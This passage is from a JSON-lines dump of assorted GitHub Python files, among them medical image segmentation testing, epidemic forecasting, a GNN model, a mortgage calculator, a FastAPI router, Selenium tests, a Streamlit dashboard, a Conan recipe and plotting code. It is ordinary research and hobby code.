type=int, default=0,\n help=\"version.\")\n parser.add_argument('-e', '--epoch', dest='epoch', type=int, default=-1,\n help=\"best epoch.\") \n return parser.parse_args()\n\nif __name__ == '__main__':\n args = get_args()\n cfg = Config(args.cfg, args.fold, False)\n rs = RandomState(523)\n\n data_dir = os.path.expanduser('~/data/Stroke_AWS_DWI_Anom_PSU/')\n training_cases = 'training_cases.txt'\n\n np.random.seed(cfg.seed) \n torch.manual_seed(cfg.seed)\n\n indx = list(range(32))\n rs.shuffle(indx)\n\n if args.epoch > 0:\n model_name = f'lambdaunet-epoch={args.epoch}'\n else:\n model_name = 'lambdaunet-best'\n\n if args.fold == 0:\n val_indx = indx[:20]\n test_indx = indx[20:]\n elif args.fold == 1:\n val_indx = indx[:10] + indx[20:]\n test_indx = indx[10:20]\n elif args.fold == 2:\n val_indx = indx[10:]\n test_indx = indx[:10]\n else:\n print(\"invalid fold\")\n exit(0)\n\n test_dataset = Stroke_lambda_test(data_dir, training_cases, test_indx, cfg.seq_len)\n \n testloader = DataLoader(test_dataset,\n batch_size=1, shuffle=False, num_workers=0, drop_last=True, pin_memory=True) \n \n if cfg.three_D_Unet:\n net = ThreeDUNet(cfg)\n net = Lit3DUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n elif cfg.attn_UNet:\n net = AttnUNet(cfg)\n net = LitLambdaUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n elif cfg.trans_Unet is not None:\n trans_config = TRANSCONFIG[cfg.trans_Unet]\n net = VisionTransformer(trans_config, img_size=256, num_classes=1)\n net = LitLambdaUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n else:\n net = UNet(cfg)\n net = LitLambdaUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n\n trainer = pl.Trainer(gpus=[1], default_root_dir=cfg.test_dir)\n log = trainer.test(net, test_dataloaders=testloader)\n dice = log[0]['test_dice']\n recall = log[0]['test_recall']\n prec = log[0]['test_prec']\n f1 = log[0]['test_f1']\n\n write_metrics_to_csv('results.csv', cfg, args.fold, dice, recall, prec, f1)\n\n # checkpoint = pl_load(checkpoint_path)\n","repo_name":"YanglanOu/LambdaUNet","sub_path":"lit_test.py","file_name":"lit_test.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"36960615565","text":"import numpy as np\nimport time\nimport pandas as pd\nfrom matplotlib import pyplot as plt \n\nfrom benchmark import benchmark \nfrom precomputing import compute_method_depth, precompute_smoothing, precompute_outofsample, minimal_method_depth, repair_increasing\nfrom visualization import plot_last_forecast \nfrom smoothing import simple_mirroring, piecewise_STL\nfrom precompute_smoothing import update_presmoothing_one_country\nfrom test_missing_or_zero import test_poisson \n\nfrom misc_methods import mean_const, linear \nfrom precomputing import precompute_forecasts\nfrom ci import confidence_intervals, convert_quantiles_to_ci, save_ci \n\ndef forecast_one_country(return_dict, country, cumulative_cases, date_, \n methods_, kwargs_list_, names_, \n smoothing_fun,\n datasource, \n H=7, \n type_data = \"cases\",\n missing_var=True,\n return_val = False,\n saveplot=False, newly=False): \n \"\"\"\n main function with methodology for singly country/region numbers forecastng: \n preprocessing, trend estimation and forecasting\n \n \n Arguments:\n -- return_dict: dictionary for parallelized runs \n -- country: country or region name\n -- cumulative_cases: np array with the cumulative historic observations\n -- date_: list with dates corresponding to cumulative_cases\n -- methods_, kwargs_list_, names_: parameters of the extrapolation methods \n -- smoothing_fun: smoothing function\n -- datasource: name of the datasource, e.g. \"JHU\" \n -- H: forecasting horizon \n -- type_data: type of the data, e.g. \"cases\"\n -- missing_var: whether to check for missing values \n -- return_val: whether to return values, for non-parallel use\n -- saveplot: boolean, whether to save figures with forecast\n -- newly: whether to save trend in smoothing_res\n \n if return_val, function returns the trend, confidence intervals and retrospective trends (used in evaluation)\n \"\"\"\n \n methods_min_depths = [minimal_method_depth(methods_[i], kwargs_list_[i]) for i in range(len(methods_))]\n comment = \"\" \n inc_ = 1 #number of intermediate points for quantile estimation\n history_for_conf_interval = ((inc_+1)*(19)+inc_)+H+3 #length of history used to compute CI\n \n #------------------handling negative values--------------------------------------\n cumulative_cases_ = repair_increasing(cumulative_cases.copy()) \n \n #------------------handling missingness------------------------------------------\n if missing_var:\n cumulative_cases_, date_, flag_nonzero_recent, zeros_missing, zeros_missing_nan = test_poisson(cumulative_cases_, date_) \n else:\n _, _, flag_nonzero_recent, _, _ = test_poisson(cumulative_cases_, date_) \n zeros_missing, zeros_missing_nan = [], [] \n total_days_to_neglect = len(zeros_missing)\n \n \n #------------------treating special cases in delay in reporing--------------------\n if (country in [\"Switzerland\", \"Belgium\"]) or (datasource in [\"OZH\",'BAG_KT']): \n step_back = 1\n if country in [\"Belgium\"]:\n step_back = 3\n if datasource in [\"OZH\",'BAG_KT']:\n step_back = 1\n if (datasource == \"OZH\") and (len(zeros_missing)>step_back):\n step_back=0\n total_days_to_neglect = step_back + len(zeros_missing) \n if (step_back>0): \n date_ = date_[:-step_back]\n zeros_missing = list(np.diff(cumulative_cases_)[-step_back:]) + zeros_missing\n zeros_missing_nan = list(np.diff(cumulative_cases_)[-step_back:]) + zeros_missing_nan\n cumulative_cases_ = cumulative_cases_[:-step_back]\n #--------------------------------------------------------------------------------- \n H_ = H + total_days_to_neglect # forecast on longer horizon in case of missing data\n data_hist = precompute_outofsample(cumulative_cases_)\n start_smoothing = np.max([0,len(cumulative_cases_)-history_for_conf_interval-1])\n \n #--------compute the trend--------------------------------------------------------\n smoothed_hist = update_presmoothing_one_country(\n cumulative_cases_, date_, country, \n smoothing_fun, \n datasource = datasource, newly=newly) \n nnz_recent = np.count_nonzero(np.diff(smoothed_hist[-1][-H:]))\n \n #---------forecasting-------------------------------------------------------------\n \n if (len(cumulative_cases_) > np.min(methods_min_depths) + 2*H) & flag_nonzero_recent &(nnz_recent >= 1): \n # if there is enough data, use the predefinded extrapolation-forecasting method\n method_opt, name_opt, kwargs_optimum = methods_[0], names_[0], kwargs_list_[0] \n method_opt_name = method_opt.__name__ \n forecast = method_opt(cumulative_cases_, smoothed_dat=smoothed_hist[-1], **kwargs_optimum, H = H_)[-(H_ + 1):] \n else:\n # not enough data for country use the constant trend or zero trend\n comment = \"very few cases (<= 10), unreliable forecast or no change in the data\"\n print(comment)\n if len(smoothed_hist[-1])>H: \n name_opt, method_opt_name, method_opt = \"mean const trend\", mean_const.__name__, mean_const\n kwargs_optimum = {'smooth': True}\n forecast = mean_const(smoothed_hist[-1], smoothed_dat=smoothed_hist[-1], H = H_, **kwargs_optimum)[-(H_ + 1):] \n elif len(smoothed_hist[-1])>0:\n forecast = [smoothed_hist[-1][-1]] * (H_+1)\n else:\n forecast = [0] * (H_+1) \n name_opt, method_opt_name, kwargs_optimum, method_opt = \"no\", \"no\", {}, mean_const\n\n smoothed, date_, sm_concat, date_delta = save_smoothed_df(country,date_,cumulative_cases,smoothed_hist,forecast,H,H_) \n \n #-----------compute confidence intervals limits----------------------------------------------\n ci_full = compute_confidence(cumulative_cases_,cumulative_cases,date_,method_opt, kwargs_optimum, \n smoothing_fun, data_hist,smoothed_hist, country, names_, H,\n saveplot, sm_concat, forecast, name_opt)\n \n #----------------------save data ------------------------------------------------------------ \n opt_method_info = [country, method_opt_name, kwargs_optimum]\n forecast_opt = [country, name_opt, method_opt_name] + list(np.diff(forecast)[-H:]) + date_delta[-H:] + [comment]\n return_dict[country] = [opt_method_info, forecast_opt, smoothed, ci_full] \n if return_val:\n return return_dict, smoothed_hist, ci_full \n \n \ndef compute_confidence(cumulative_cases_,cumulative_cases,date_,\n method_opt, kwargs_optimum, \n smoothing_fun, \n data_hist, smoothed_hist, country, names_, H,\n saveplot,sm_concat,forecast, name_opt, inc_=1):\n \"\"\"\n compute confidence intervals \n \"\"\"\n ci_full = [] \n history_for_conf_interval = (inc_+1)*(20)+H+2\n if (len(cumulative_cases_)>20+H+3) and (len(cumulative_cases_) threshold).nonzero().t()\n # edge_weight = adj[offset, row, col]\n row += offset * n_feature\n col += offset * n_feature\n edge_index = torch.stack([row, col], dim=0)\n x_gnn = x.contiguous().view(batch_size * n_feature, len_feature) # 这里改动了长度\n batch = torch.arange(0, batch_size).view(-1, 1).repeat(1, n_feature).view(-1).to('cuda:0')\n\n x_gnn = F.relu(self.graph_conv1(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool1(x_gnn, edge_index, None, batch)\n x_gnn_1 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n x_gnn = F.relu(self.graph_conv2(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool2(x_gnn, edge_index, None, batch)\n x_gnn_2 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n x_gnn = F.relu(self.graph_conv3(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool3(x_gnn, edge_index, None, batch)\n x_gnn_3 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n # (Batch, 2 * hidden)\n x_gnn = x_gnn_1 + x_gnn_2 + x_gnn_3\n\n ### 新增\n\n # LSTM\n\n x_gru = self.gru(x)[0]\n x_gru = x_gru.mean(1)\n x_gru = x_gru.view(N, -1)\n\n # Covolutional Network\n # input ts: # N * C * L\n\n # for i in range(len(self.conv_1_models)):\n x_conv = x\n # x_conv = self.conv_1_models[i](x[:, self.idx[i], :])\n x_conv = self.conv_1(x_conv)\n # x_conv = self.SE1(x_conv)\n # x_conv = self.conv_bn_1(x_conv)\n # x_conv = F.leaky_relu(x_conv)\n\n x_conv = self.conv_2(x_conv)\n # x_conv = self.SE2(x_conv)\n # x_conv = self.conv_bn_2(x_conv)\n # x_conv = F.leaky_relu(x_conv)\n\n x_conv = self.conv_3(x_conv)\n # x_conv = self.conv_bn_3(x_conv)\n # x_conv = F.leaky_relu(x_conv)\n\n x_conv = torch.mean(x_conv, 2)\n\n # if i == 0:\n # x_conv_sum = x_conv\n # else:\n # x_conv_sum = torch.cat([x_conv_sum, x_conv], dim=1)\n #\n # x_conv = x_conv_sum\n\n x = torch.cat([x_conv, x_gru], dim=1)\n\n # linear mapping to low-dimensional space\n x = torch.cat((x, x_gnn), 1)\n x = self.mapping(x)\n\n # generate the class protocol with dimension C * D (nclass * dim)\n proto_list = []\n for i in range(self.nclass):\n idx = (labels[idx_train].squeeze() == i).nonzero().squeeze(1)\n if self.use_att:\n A = self.att_models[i](x[idx_train][idx]) # N_k * 1\n A = torch.transpose(A, 1, 0) # 1 * N_k\n A = F.softmax(A, dim=1) # softmax over N_k\n\n class_repr = torch.mm(A, x[idx_train][idx]) # 1 * L\n class_repr = torch.transpose(class_repr, 1, 0) # L * 1\n else: # if do not use attention, simply use the mean of training samples with the same labels.\n class_repr = x[idx_train][idx].mean(0) # L * 1\n proto_list.append(class_repr.view(1, -1))\n x_proto = torch.cat(proto_list, dim=0)\n\n # prototype distance\n proto_dists = euclidean_dist(x_proto, x_proto)\n proto_dists = torch.exp(-0.5*proto_dists)\n num_proto_pairs = int(self.nclass * (self.nclass - 1) / 2)\n proto_dist = torch.sum(proto_dists) / num_proto_pairs\n\n dists = euclidean_dist(x, x_proto)\n\n # dump_embedding(x_proto, x, labels)\n return torch.exp(-0.5*dists), proto_dist\n","repo_name":"WenweiGu/TSNet","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27163848012","text":"from modules.DebtCalculation import DebtCalculation\n\nprint(\"Liberate yourself from your mortgage\\n\")\n# try:\n# debt = float(input(\"What is the total debt?\\n\"))\n# remaining_months = int(input(\"How many months are remaining in your term?\\n\"))\n# monthly_payment = float(input(\"What is your obligatory monthly payment?\\n\"))\n# avg_annual_interest_rate = float(input(\"What's the average APR % of the entire term?\\n\"))/100\n# monthly_overpayment = float(input(\"What's your average monthly overpayment?\\n\"))\n# except Exception as e:\n# print(e)\n# exit()\n\ndebtCalc = DebtCalculation(990000.0, 15*12, 580.0, 0.03, 1200.0)\n\ndef formatGbp(f):\n #print(\"f is:{}\".format(f))\n f = round(f, 2)\n if (f<0):\n return \"-£{}\".format(abs(f))\n else:\n return \"£{}\".format(f)\n\ndef yearsAndMonth(monthIndex):\n years = int((monthIndex+1)/12)\n month_of_year = (monthIndex+1)-years*12\n return years, month_of_year\n\ndef reportWithinRemainingMonths():\n for i in range(debtCalc.remaining_months):\n years, month_of_year = yearsAndMonth(i)\n debtCalc.calculate()\n if (i%12==0):\n print(\"---\\nYear\", years, \"\\n---\\n\")\n print(\"Month\", i+1)\n print(\"Debt payment this month:{}\".format(formatGbp(debtCalc.monthly_debt_payment)))\n print(\"Capital paid:{}\".format(formatGbp(debtCalc.capital_paid)))\n if (debtCalc.debt > 0):\n print(\"Remaining debt:{}\\n\".format(formatGbp(debtCalc.debt)))\n else:\n print(\"\\nYou're done after {} years and {} months. With {} to spare!\\n\".format(years, month_of_year, abs(round(debtCalc.debt, 2))))\n exit()\n\ndef reportIfOverExpectedMonths():\n extra_months = 0\n while(debtCalc.debt > 0):\n debtCalc.calculate()\n extra_months += 1\n if (extra_months == debtCalc.remaining_months+100):\n print(\"Calculation limit reached [{}]. Your outstanding debt is still {}\".format(extra_months, formatGbp(debtCalc.debt)))\n exit()\n print(\"You needed an extra {} month(s) to clear your debt\".format(extra_months))\n\n\nif __name__== \"__main__\":\n reportWithinRemainingMonths()\n reportIfOverExpectedMonths()\n","repo_name":"LintCroft/debt-liberator","sub_path":"liberate-mortgage.py","file_name":"liberate-mortgage.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70572548412","text":"from app import schemas, db_services, outer_services\nfrom app.database import get_db\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends, APIRouter\n\nrouter = APIRouter()\n\n\nasync def get_another_and_create(database):\n while True:\n try:\n another_questions = await outer_services.jservice_request(1)\n db_services.create_question(\n schemas.QuestionSchema(question=another_questions[0][\"question\"],\n answer=another_questions[0][\"answer\"]),\n database\n )\n break\n except:\n pass\n\n@router.post('/')\nasync def add_questions(data: schemas.RequestDataSchema = None, database: Session = Depends(get_db)):\n data_to_return = db_services.get_last_question(database)\n if not data_to_return:\n returned_question = {}\n else:\n returned_question = schemas.QuestionSchema(\n id=data_to_return.id,\n question=data_to_return.question,\n answer=data_to_return.answer,\n created_at=data_to_return.created_at\n )\n questions = await outer_services.jservice_request(data.questions_num)\n for question in questions:\n try:\n create_data = schemas.QuestionSchema(question=question[\"question\"], answer=question[\"answer\"])\n db_services.create_question(create_data, database)\n except:\n await get_another_and_create(database)\n return returned_question\n\n\n\n@router.get('/')\nasync def get_question(question_id: int = None, database: Session = Depends(get_db)):\n data = db_services.get_question(question_id, database)\n if data:\n return data\n else:\n return {}\n","repo_name":"theMizza/fastapi_example","sub_path":"project/app/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33397718570","text":"from time import sleep\nfrom testing.test_unittest.test_base import FilerBaseTestCase\n\n\nclass FilterTestCase(FilerBaseTestCase):\n\n def testing_if_filter_exist(self):\n \"\"\"testing if exist filter button\"\"\"\n self.login_to_filer_block()\n self.get_filter_block()\n set_text = set(self.get_filter_block().text.split('\\n'))\n set_words = {'Partner preference', 'Building Info.', 'Buildings',\n 'Buildings with..', 'Structures', 'Pre-plans',\n 'Area(sq.ft.)', 'Clear', 'Sprinklered', 'Multi-family',\n 'Exclude Partner', 'Select Pre-plans', 'Vacant',\n 'Present', 'Standpipes', 'Within the Last 30 Days',\n 'Special', 'Older than a year', 'Apply', 'Fire Alarms',\n 'Commercial', 'Non-sprinklered', 'Not present',\n 'Select Building Info Option', 'Without pictures',\n 'Truss Roof', 'With pictures'}\n sleep(2)\n self.assertEquals(set_words, set_text)\n\n def testing_if_apply_and_clear_buttons_exist(self):\n \"\"\"testing if exist apply button\"\"\"\n self.login_to_filer_block()\n filter_block = self.selenium.find_element_by_class_name(\n 'form-group')\n set_text = set(filter_block.text.split('\\n'))\n set_words = {'Apply', 'Clear'}\n sleep(1)\n self.assertEquals(set_words, set_text)\n\n def testing_if_work_back_button(self):\n \"\"\"testing if back button hide page\"\"\"\n self.login_to_filer_block()\n self.get_filter_block()\n set_text = set(self.get_filter_block().text.split('\\n'))\n set_words = {'Partner preference', 'Building Info.', 'Buildings',\n 'Buildings with..', 'Structures', 'Pre-plans'}\n sleep(2)\n self.get_back_button().click()\n self.assertNotIn(set_words, set_text)\n","repo_name":"irynavaskiv1/flowmsp_web_test","sub_path":"testing/test_unittest/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75258718651","text":"from dotenv import load_dotenv\nfrom os import getenv\nfrom setuptools import setup, find_packages\n \nload_dotenv()\n\nEMAIL = getenv(\"EMAIL\")\nAUTHOR = getenv(\"AUTHOR\")\n \nsetup(\n name = \"py_lava_api\",\n version = \"0.1.0\",\n keywords = (\"lava\", ),\n description = \"Simple work with lava\",\n long_description = \"Simple work with lava\",\n license = \"MIT Licence\",\n \n url = \"https://github.com/DephPhascow/py_lava_api\",\n author = AUTHOR,\n author_email = EMAIL,\n \n packages = find_packages(),\n include_package_data = True,\n platforms = \"any\",\n install_requires = [\"requests\"]\n)","repo_name":"DephPhascow/py_lava_api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"869100695","text":"import pandas as pd\nimport numpy as np\nimport shap\nimport streamlit as st\nimport streamlit.components.v1 as components\nimport plotly.graph_objects as go\nfrom plotly import tools\nimport plotly.offline as py\nfrom pkg_summarize.summarize import extract_summary\nfrom pkg_keyword.keyword import extract\nfrom pkg_sentiment.sentiment import get_sentiment\nfrom pkg_preprocess.preprocess import clean_data\nimport plotly.express as px\n\nst.set_page_config(page_title=\"Analytics Dashboard\", layout=\"wide\")\nst.markdown(\"## Analytics Dashboard\")\n\ncol1, buffer, col2 = st.columns([3, 1, 3])\n\ndata = col2.expander('Data View')\nconfig = col1.expander(\"Configuration\")\ndetail_view = config.checkbox('Detailed View')\npre_load = config.checkbox('Preloaded Data')\n\ndf = pd.read_csv(r\"Downloads\\G2_ringcentral-video.csv\")\n\ndata.dataframe(df)\n\ndf[\"review\"] = df[\"Pros\"] + df[\"Cons\"]\n\nif not detail_view:\n df[\"Rating\"] = df[\"Rating\"].astype(int)\n df[\"Rating\"] = df[\"Rating\"].replace(0, 1)\n\ndf_neg = df[df[\"Rating\"] <= 3][[\"Rating\", \"review\"]]\ndf_neu = df[(df[\"Rating\"] > 3) & (df[\"Rating\"] < 4)][[\"Rating\", \"review\"]]\ndf_pos = df[df[\"Rating\"] >= 4][[\"Rating\", \"review\"]]\n\nfig1 = px.pie(df, values=\"Rating\", names=\"Rating\")\n\nfig1.update_layout(\n title=\"Ringcentral Rating Distribution\")\ncol1.plotly_chart(fig1)\n\n# col2.markdown(\"### Positive review summary\")\npos_doc = clean_data(df_pos)\nneg_doc = clean_data(df_neg)\n\npos_keyword = extract(pos_doc)\nneg_keyword = extract(neg_doc)\n\nneg_keyword_ = [(x, -100 * y) for x, y in neg_keyword]\npos_keyword_ = [(x, 100 * y) for x, y in pos_keyword]\n\nkey = pd.concat([pd.DataFrame(pos_keyword_), pd.DataFrame(neg_keyword_)])\nkey = key.reset_index(drop=True)\n\nkey[\"key_phrase\"] = key[0]\nkey[\"score\"] = key[1]\ndel key[1]\ndel key[0]\n\nfig2 = go.Figure()\n\ncategory_order = list(key[\"key_phrase\"].unique())\n\nfig2.add_trace(go.Bar(\n x=key[\"score\"],\n y=key[\"key_phrase\"],\n orientation='h',\n marker_color=key[\"score\"]\n))\n\nfig2.update_layout(\n barmode='relative',\n title=\"Ringcentral Key Features\"\n)\n\ncol1.plotly_chart(fig2)\n\npos_doc_text = \". \".join(pos_doc)\nneg_doc_text = \". \".join(neg_doc)\n\ncol2.subheader(\"Positive review summary\")\n# col2.caption(extract_summary(pos_doc_text))\ncol2.caption(\n \"Able to conduct team-building meetings remotely some employees are more comfortable with Ringcentral as opposed \"\n \"to other providers/apps . I love that the 'dashboard is simple and easy to use It really helps some of the older \"\n \"people I work with who are a little unenthusiastic about ZOOM . I like that its all tied into one platform with \"\n \"ring central calling .\")\n\ncol2.subheader(\"Negative review summary\")\n# col2.caption(extract_summary(neg_doc_text))\ncol2.caption(\"If you join from the browser, it 's almost unuseable. The lag was awful it had an echo and the camera \"\n \"stopped working. .There are often glitches in the program where it turns voices into sounding robotic \"\n \"does n't allow a screen share. Platform feels dated and clunky Admin portal is difficult to navigate \"\n \"Video conferencing sessions frequently lag glitch or do not work as expected.\")","repo_name":"ashutoshraj/review_analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37726184182","text":"def main(): # pragma: no cover\n from brian2 import start_scope, mvolt, ms, NeuronGroup, StateMonitor, run\n import matplotlib.pyplot as plt\n import neo\n import quantities as pq\n\n start_scope()\n\n # Izhikevich neuron parameters.\n a = 0.02 / ms\n b = 0.2 / ms\n c = -65 * mvolt\n d = 6 * mvolt / ms\n I = 4 * mvolt / ms\n\n # Standard Izhikevich neuron equations.\n eqs = \"\"\"\n dv/dt = 0.04*v**2/(ms*mvolt) + (5/ms)*v + 140*mvolt/ms - u + I : volt\n du/dt = a*((b*v) - u) : volt/second\n \"\"\"\n\n reset = \"\"\"\n v = c\n u += d\n \"\"\"\n\n # Setup and run simulation.\n G = NeuronGroup(1, eqs, threshold='v>30*mvolt', reset='v = -70*mvolt')\n G.v = -65 * mvolt\n G.u = b * G.v\n M = StateMonitor(G, 'v', record=True)\n run(300 * ms)\n\n # Store results in neo format.\n vm = neo.core.AnalogSignal(M.v[0], units=pq.V, sampling_period=0.1 * pq.ms)\n\n # Plot results.\n plt.figure()\n plt.plot(vm.times * 1000, vm * 1000) # Plot mV and ms instead of V and s.\n plt.xlabel('Time (ms)')\n plt.ylabel('mv')\n\n # Save results.\n iom = neo.io.PyNNNumpyIO('spike_extraction_test_data')\n block = neo.core.Block()\n segment = neo.core.Segment()\n segment.analogsignals.append(vm)\n block.segments.append(segment)\n iom.write(block)\n\n # Load results.\n iom2 = neo.io.PyNNNumpyIO('spike_extraction_test_data.npz')\n data = iom2.read()\n vm = data[0].segments[0].analogsignals[0]\n\n # Plot results.\n # The two figures should match.\n plt.figure()\n plt.plot(vm.times * 1000, vm * 1000) # Plot mV and ms instead of V and s.\n plt.xlabel('Time (ms)')\n plt.ylabel('mv')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NeuralEnsemble/elephant","sub_path":"elephant/test/make_spike_extraction_test_data.py","file_name":"make_spike_extraction_test_data.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"78"} +{"seq_id":"72153964732","text":"from conans import ConanFile, CMake, tools\nfrom conans.tools import download, unzip, os_info\nfrom distutils.dir_util import copy_tree\nimport os\nimport shutil\nimport multiprocessing\n\n# http://gainput.johanneskuhlmann.de/api/page_building.html\nclass GainputConan(ConanFile):\n name = \"gainput\"\n version = \"master\"\n description = \"Conan package for gainput.\"\n url = \"https://github.com/jkuhlmann/gainput\"\n license = \"MIT\"\n settings = \"arch\", \"build_type\", \"compiler\", \"os\"\n generators = \"cmake\"\n exports_sources = \"lib/source/*\"\n options = {\n \"shared\": [True, False],\n \"gainput_debug\": [True, False],\n \"gainput_dev\": [True, False],\n \"gainput_enable_recorder\": [True, False],\n \"gainput_lib_build\": [True, False]\n }\n default_options = \\\n \"shared=False\", \\\n \"gainput_debug=False\", \\\n \"gainput_dev=False\", \\\n \"gainput_enable_recorder=False\", \\\n \"gainput_lib_build=True\",\n\n def source(self):\n self.run(\"git clone git://github.com/jkuhlmann/gainput.git\")\n\n def build(self):\n cmake = CMake(self)\n #if self.options.shared:\n # cmake.definitions[\"GAINPUT_BUILD_STATIC\"] = \"OFF\"\n #else:\n # cmake.definitions[\"GAINPUT_BUILD_SHARED\"] = \"OFF\"\n if self.options.gainput_debug:\n cmake.definitions[\"GAINPUT_DEBUG\"] = \"ON\"\n if self.options.gainput_dev:\n cmake.definitions[\"GAINPUT_DEV\"] = \"ON\"\n if self.options.gainput_enable_recorder:\n cmake.definitions[\"GAINPUT_ENABLE_RECORDER\"] = \"ON\"\n if self.options.gainput_lib_build:\n cmake.definitions[\"GAINPUT_LIB_BUILD\"] = \"ON\"\n cmake.configure(source_folder=\"gainput\")\n cmake.build()\n\n def collect_headers(self, include_folder):\n self.copy(\"*.h\" , dst=\"include\", src=include_folder)\n self.copy(\"*.hpp\", dst=\"include\", src=include_folder)\n self.copy(\"*.inl\", dst=\"include\", src=include_folder)\n\n def package(self):\n self.collect_headers(\"gainput/lib/include\")\n self.copy(\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"*.dylib*\", dst=\"lib\", keep_path=False)\n self.copy(\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = [\"gainput\"]\n","repo_name":"DrewCarlson/conan-gainput","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38296649665","text":"import numpy as np\nfrom typing import List\n\nfrom channest.heights import LayerHeights\n\n\nclass LayerHeightPlot:\n def __init__(self):\n import plotly.graph_objs as go\n self._f = go.Figure()\n self._f.layout.xaxis.range = (-0.5, 15.0)\n self._f.layout.xaxis.title = 'Thickness (m)'\n self._f.layout.yaxis.title = 'Sampled Layer #'\n self._f.layout.title = 'Channel Thickness Estimates'\n self._f.layout.hovermode = 'y'\n self._f.layout.legend.font.family = 'monospace'\n\n def add_heights(self,\n heights: List[LayerHeights],\n suffix: str):\n # Calculate statistics: mean, median, max, modes\n values = [h.flat_values() for h in heights]\n values = [v if v.size > 0 else np.zeros(1) for v in values] # Transform to make stats calculations easier\n means = np.array([np.mean(v) for v in values])\n medians = np.array([np.median(v) for v in values])\n maxs = np.array([np.max(v) for v in values])\n ys = np.arange(means.size)\n self._f.add_scatter(\n x=means,\n y=ys,\n mode='lines+markers',\n name='Mean ' + suffix\n )\n self._f.add_scatter(\n x=medians,\n y=ys,\n mode='lines+markers',\n name='Median ' + suffix\n )\n self._f.add_scatter(\n x=maxs,\n y=ys,\n mode='markers+lines',\n marker=dict(\n color='#000',\n ),\n name='Max. ' + suffix\n )\n h_max = LayerHeights.calculate_max_height(heights)\n main_modes = np.array([h.flat_values_max_mode(h_max) for h in heights])\n self._f.add_scatter(\n x=np.where(np.isnan(main_modes), 0, main_modes),\n y=ys,\n mode='markers+lines',\n marker=dict(\n color='#f90'\n ),\n name='Main mode ' + suffix\n )\n th = 0.01\n max_circle = max(400 / len(heights), 15)\n for i_layer, layer in enumerate(heights):\n kde_modes = layer.flat_values_kde_modes(h_max)\n x_points = np.insert(kde_modes[0], [0, kde_modes[0].size], [0, maxs[i_layer]])\n y_points = np.insert(kde_modes[1], [0, kde_modes[1].size], [0, 0])\n self._f.add_scatter(\n x=x_points,\n y=[i_layer] * x_points.size,\n mode='lines+markers',\n marker=dict(\n color='#0c0',\n # Hide small entries by setting size to 0:\n size=np.where(y_points > th, 5 + y_points * (max_circle - 5), 0),\n line=dict(width=2, color='#000')\n ),\n text=[f'Layer #: {i_layer}
    Peak: {p:2.2f}'\n for t, p in zip(x_points, y_points)],\n name='Modes ' + suffix,\n legendgroup='Modes',\n showlegend=i_layer == 0,\n )\n\n def write(self, fn):\n self._f.write_html(fn + '.html', include_plotlyjs='cdn')\n","repo_name":"NorskRegnesentral/channest","sub_path":"channest/qc/layerheightplot.py","file_name":"layerheightplot.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17275472636","text":"\nmapping = {\n'Four_of_a_Kind': 7,\n'Full_House': 6,\n'Straight': 5,\n'Three_of_a_Kind': 4,\n'Two_pairs': 3,\n'One_pairs': 2,\n'Sum_of_Cards': 1\n}\n\nname2value = ['_', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\n\n\nfrom collections import Counter\ndef whatkind(allcards):\n allcards = [name2value.index(c) for c in allcards]\n c = Counter(allcards)\n max_times = max(c.values())\n if max_times == 4:\n return 'Four_of_a_Kind'\n elif max_times == 